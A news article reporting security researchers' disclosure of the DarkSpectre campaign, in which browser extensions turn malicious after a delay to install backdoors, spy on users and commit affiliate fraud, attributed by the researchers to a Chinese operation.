DarkSpectre Malware Campaign Infected 8.8 Million Chrome, Edge & Firefox Users

Security researchers at Koi have uncovered a massive, coordinated spyware campaign that spans 100+ Google Chrome, Microsoft Edge, and Mozilla FireFox extensions, which seem to function legitimately, but (eventually) exhibit malicious behavior tied to a threat actor called DarkSpectre. This behavior includes stripping security protections, installing backdoors for remote code execution, performing surveillance, and disabling anti-fraud protections on Chinese e-commerce affiliate links.

The DarkSpectre naming comes from Koi, and is attributed to at least three malware campaigns infecting over 8.8 million users in the past seven years—these campaigns include "The Zoom Stealer", with 2.2 million victims, "ShadyPanda", with 5.6 million victims, and "GhostPoster", with 1.05 million victims. The goals of these campaigns vary from stealing corporate data, to covert payload delivery, and the aforementioned affiliate fraud, but they all use legitimate-looking extensions to do their dirty work. In fact, they usually are legitimate extensions...at first. But after either a three-day period or a predetermined activation point, these "sleeper extensions" go rogue, and they've been getting away with it for a long time.


As Koi states, this "isn't three separate threat actors running similar operations. This is one highly organized operation—and while tracking their infrastructure, we stumbled onto something new: a 2.2 million user campaign stealing corporate meeting intelligence that we're disclosing for the first time."

The report further states that "This is organized. This is funded. This is strategic," and attributes DarkSpectre to a well-funded Chinese operation. This is for various reasons, including server infrastructure rooted in China, Chinese language strings present in the code, affiliate fraud schemes targeting Chinese e-commerce platforms, and the sheer scale/complexity of the campaigns. Whether they're state-funded or not, it's not clear at this point, but the longevity and required funding to make all of this happen does lean strongly in that direction.

To help defend against malware like this, the researchers recommend readers install "Wings", a risk engine that analyzes every extension (and subsequent update revision) with a combination of static/dynamic analysis and agentic AI. In theory, other anti-malware and anti-virus software should also be able to catch these threats now that they've been identified. Considering how long they've been allowed to run amok, however, it would seem that the greatest onus is on Google/Microsoft/Mozilla to start monitoring extension updates for malicious behavior.